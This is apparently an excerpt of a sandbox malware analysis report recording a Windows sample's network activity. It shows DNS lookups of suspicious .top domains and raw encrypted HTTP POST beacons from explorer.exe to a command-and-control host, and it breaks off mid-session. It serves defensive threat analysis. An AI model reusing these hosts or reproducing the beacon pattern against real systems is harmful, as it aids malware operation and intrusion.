                                                                                                                          Oct 29, 2021 17:06:57.259084940 CEST192.168.2.78.8.8.80x2affStandard query (0)sysaheu90.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.565092087 CEST192.168.2.78.8.8.80x73beStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.432631016 CEST192.168.2.78.8.8.80xc934Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.712368965 CEST192.168.2.78.8.8.80x7bddStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.892929077 CEST192.168.2.78.8.8.80x35d6Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.131309986 CEST192.168.2.78.8.8.80x5692Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.354588032 CEST192.168.2.78.8.8.80xf170Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.558885098 CEST192.168.2.78.8.8.80xedc3Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.737893105 CEST192.168.2.78.8.8.80x794fStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.925671101 CEST192.168.2.78.8.8.80x4a8fStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:08.923965931 CEST192.168.2.78.8.8.80x13c4Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:12.241388083 CEST192.168.2.78.8.8.80x5f01Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:15.406409979 CEST192.168.2.78.8.8.80x6008Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:18.601684093 CEST192.168.2.78.8.8.80x258bStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:21.916219950 CEST192.168.2.78.8.8.80x9b2Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:25.093633890 CEST192.168.2.78.8.8.80xd489Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:25.209403038 CEST192.168.2.78.8.8.80x5057Standard query (0)toptelete.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.096317053 CEST192.168.2.78.8.8.80x131eStandard query (0)nusurtal4f.netA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.563877106 CEST192.168.2.78.8.8.80xd767Standard query (0)znpst.topA (IP address)IN (0x0001)

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                          Oct 29, 2021 17:06:13.350178003 CEST8.8.8.8192.168.2.70x551bName error (3)xacokuo8.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:13.646771908 CEST8.8.8.8192.168.2.70xc0e3No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:14.082237005 CEST8.8.8.8192.168.2.70xc36dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:14.595715046 CEST8.8.8.8192.168.2.70xa0f1No error (0)privacytoolzforyou-6000.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:16.921886921 CEST8.8.8.8192.168.2.70x706fNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:17.143802881 CEST8.8.8.8192.168.2.70x270dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:33.311800957 CEST8.8.8.8192.168.2.70xf97fNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:33.877398968 CEST8.8.8.8192.168.2.70x99fbNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.094301939 CEST8.8.8.8192.168.2.70x84baNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.268408060 CEST8.8.8.8192.168.2.70xf332No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.433589935 CEST8.8.8.8192.168.2.70x51f8No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.265938997 CEST8.8.8.8192.168.2.70xa6a7No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.696312904 CEST8.8.8.8192.168.2.70x64b8No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.881906986 CEST8.8.8.8192.168.2.70x8878No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:39.041385889 CEST8.8.8.8192.168.2.70xef54No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.073606968 CEST8.8.8.8192.168.2.70xf1fbNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST8.8.8.8192.168.2.70xf9a7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST8.8.8.8192.168.2.70xf9a7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST8.8.8.8192.168.2.70xf9a7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST8.8.8.8192.168.2.70xf9a7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST8.8.8.8192.168.2.70xf9a7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.490109921 CEST8.8.8.8192.168.2.70x23a4No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST8.8.8.8192.168.2.70x975aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST8.8.8.8192.168.2.70x975aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST8.8.8.8192.168.2.70x975aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST8.8.8.8192.168.2.70x975aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST8.8.8.8192.168.2.70x975aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.624650002 CEST8.8.8.8192.168.2.70xc274No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.806117058 CEST8.8.8.8192.168.2.70x6fb1No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.978352070 CEST8.8.8.8192.168.2.70xc988No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.240955114 CEST8.8.8.8192.168.2.70x47f2No error (0)iyc.jelikob.ru81.177.141.36A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.513746977 CEST8.8.8.8192.168.2.70x30d1No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.675204039 CEST8.8.8.8192.168.2.70x2d48No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.848051071 CEST8.8.8.8192.168.2.70x1b59No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:48.006903887 CEST8.8.8.8192.168.2.70x3258No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.405937910 CEST8.8.8.8192.168.2.70x3aeeNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.586323977 CEST8.8.8.8192.168.2.70x8213No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.750411034 CEST8.8.8.8192.168.2.70x2d18No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.917984009 CEST8.8.8.8192.168.2.70xbc7aNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:52.085761070 CEST8.8.8.8192.168.2.70xcd07No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:56.902486086 CEST8.8.8.8192.168.2.70xaec2No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:57.093630075 CEST8.8.8.8192.168.2.70x7c73No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:57.753387928 CEST8.8.8.8192.168.2.70x2affNo error (0)sysaheu90.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST8.8.8.8192.168.2.70x73beNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST8.8.8.8192.168.2.70x73beNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST8.8.8.8192.168.2.70x73beNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST8.8.8.8192.168.2.70x73beNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST8.8.8.8192.168.2.70x73beNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.452478886 CEST8.8.8.8192.168.2.70xc934No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.731681108 CEST8.8.8.8192.168.2.70x7bddNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:01.912451029 CEST8.8.8.8192.168.2.70x35d6No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.150087118 CEST8.8.8.8192.168.2.70x5692No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.374130011 CEST8.8.8.8192.168.2.70xf170No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.576109886 CEST8.8.8.8192.168.2.70xedc3No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.757611990 CEST8.8.8.8192.168.2.70x794fNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:02.945072889 CEST8.8.8.8192.168.2.70x4a8fNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:08.942763090 CEST8.8.8.8192.168.2.70x13c4Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:12.261032104 CEST8.8.8.8192.168.2.70x5f01Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:15.507477999 CEST8.8.8.8192.168.2.70x6008Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:18.621800900 CEST8.8.8.8192.168.2.70x258bName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:21.933847904 CEST8.8.8.8192.168.2.70x9b2Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:25.113251925 CEST8.8.8.8192.168.2.70xd489Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:25.313482046 CEST8.8.8.8192.168.2.70x5057No error (0)toptelete.top172.67.160.46A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:25.313482046 CEST8.8.8.8192.168.2.70x5057No error (0)toptelete.top104.21.9.146A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.127104998 CEST8.8.8.8192.168.2.70x131eNo error (0)nusurtal4f.net45.141.84.21A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top91.203.174.38A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top190.218.32.60A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top187.212.186.104A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top151.251.30.69A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top183.78.205.92A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top220.125.1.129A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top87.119.100.220A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top178.30.101.69A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top211.53.202.252A (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST8.8.8.8192.168.2.70xd767No error (0)znpst.top197.44.54.172A (IP address)IN (0x0001)

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • cdn.discordapp.com
                                                                                                                          • iyc.jelikob.ru
                                                                                                                          • nbqwgqd.org
                                                                                                                            • hajezey1.top
                                                                                                                          • tkdnntfgka.net
                                                                                                                          • privacytoolzforyou-6000.top
                                                                                                                          • ebdlywmw.org
                                                                                                                          • cdpdtdiu.org
                                                                                                                          • ahqwfkl.org
                                                                                                                          • mmrybwu.org
                                                                                                                          • dlvxn.com
                                                                                                                          • axwksdg.org
                                                                                                                          • uoujietq.org
                                                                                                                          • byswyrncsp.net
                                                                                                                          • tvwcnabmgu.org
                                                                                                                          • jkprjvqhr.org
                                                                                                                          • maugsjqxon.com
                                                                                                                          • evbmwx.org
                                                                                                                          • cmmceyrmx.com
                                                                                                                          • qtsqgh.org
                                                                                                                          • pfcgdf.net
                                                                                                                          • majoeohj.org
                                                                                                                          • fftiyhdhr.org
                                                                                                                          • ogkwhlvf.com
                                                                                                                          • uopmdi.org
                                                                                                                          • iqyfkemb.com
                                                                                                                          • macmw.net
                                                                                                                          • lqkdg.net
                                                                                                                          • bdliq.net
                                                                                                                          • caojtt.com
                                                                                                                          • exjwgsme.org
                                                                                                                          • tejnpx.net
                                                                                                                          • fkxqdusmf.com
                                                                                                                          • sysaheu90.top
                                                                                                                          • plwck.net
                                                                                                                          • doqhc.org
                                                                                                                          • bwosllgktu.com
                                                                                                                          • dafoy.net
                                                                                                                          • nitiuliqi.net
                                                                                                                          • ymtgtssq.com
                                                                                                                          • jvgpciy.net
                                                                                                                          • drcvhg.net
                                                                                                                          • toptelete.top
                                                                                                                          • 194.180.174.181

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.749810162.159.129.233443C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.749812162.159.129.233443C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          10192.168.2.749755185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:17.398834944 CEST1539OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://cdpdtdiu.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 333
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:17.398870945 CEST1539OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 34 a4 b1 7b
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d4{Ar70ybvdKnbwq|;#,W!RS'0MYt(.ST+Hl+9PxVHzLN]tRJ@J-ZHX^,0Ume|\=
                                                                                                                          Oct 29, 2021 17:06:17.482110023 CEST1540INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:17 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2cI:82OI:@_MqBJK,0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          11192.168.2.749771185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:33.365226984 CEST1899OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ahqwfkl.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 131
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:33.365315914 CEST1899OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 2c a8 c4 60
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d,`;w}L$m=(1Y2h{eWV&h:9&p_P
                                                                                                                          Oct 29, 2021 17:06:33.444222927 CEST1901INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:33 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          12192.168.2.749775185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:33.932898045 CEST1952OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://mmrybwu.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 169
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:33.933594942 CEST1952OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 5b d2 88 7e
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d[~:hoA[`{+Te5_m/af3/U\_Av/K>/#a%<U64`w
                                                                                                                          Oct 29, 2021 17:06:34.014120102 CEST1955INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:33 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          13192.168.2.749778185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:34.149869919 CEST1962OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://dlvxn.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 122
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:34.149924040 CEST1962OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 44 dc d6 65
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dDe5pmn_hM<kw\)W(.Ye
                                                                                                                          Oct 29, 2021 17:06:34.230443954 CEST1977INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:34 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          14192.168.2.749780185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:34.323156118 CEST1998OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://axwksdg.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 270
                                                                                                                          Host: hajezey1.top
